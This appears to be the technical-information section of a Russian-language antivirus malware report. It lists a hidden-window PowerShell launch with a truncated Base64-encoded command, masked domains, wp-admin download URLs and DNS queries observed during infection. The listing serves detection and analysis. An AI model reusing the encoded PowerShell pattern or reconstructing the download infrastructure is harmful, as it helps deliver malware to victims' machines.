Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABIAG8AbQBlAF8ATABvAGEAbgBfAEEAYwBjAG8AdQBuAHQAbQBkAGkAPQAnAHUAbgBsAGUAYQBzAGgAbgBqAG8AJwA7ACQAVABlAHgAYQBzAGgAYwBwACAAPQAgACcAOQA1ADcAJwA7ACQAQgBvAHIAZABlAHIAcwBhAGMAcAA9ACcAYwBhAHIAZAB...
- 'ka###zsefied.ir':80
- 'le###kaca21.com':80
- 'lu###vibes.ca':80
- 'lu###vibes.ca':443
- http://le###kaca21.com/wp-admin/ghr3wsg3wy-etg9-15932/
- http://lu###vibes.ca/wp-admin/yqxgTRs/
- 'lu###vibes.ca':443
- DNS ASK ka###zsefied.ir
- DNS ASK lu##inx.eu
- DNS ASK le###kaca21.com
- DNS ASK lu###vibes.ca
- DNS ASK cm#.##mfai-hk.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABIAG8AbQBlAF8ATABvAGEAbgBfAEEAYwBjAG8AdQBuAHQAbQBkAGkAPQAnAHUAbgBsAGUAYQBzAGgAbgBqAG8AJwA7ACQAVABlAHgAYQBzAGgAYwBwACAAPQAgACcAOQA1ADcAJwA7ACQAQgBvAHIAZABlAHIAcwBhAGMAcAA9ACcAYwBhAHIAZAB...' (со скрытым окном)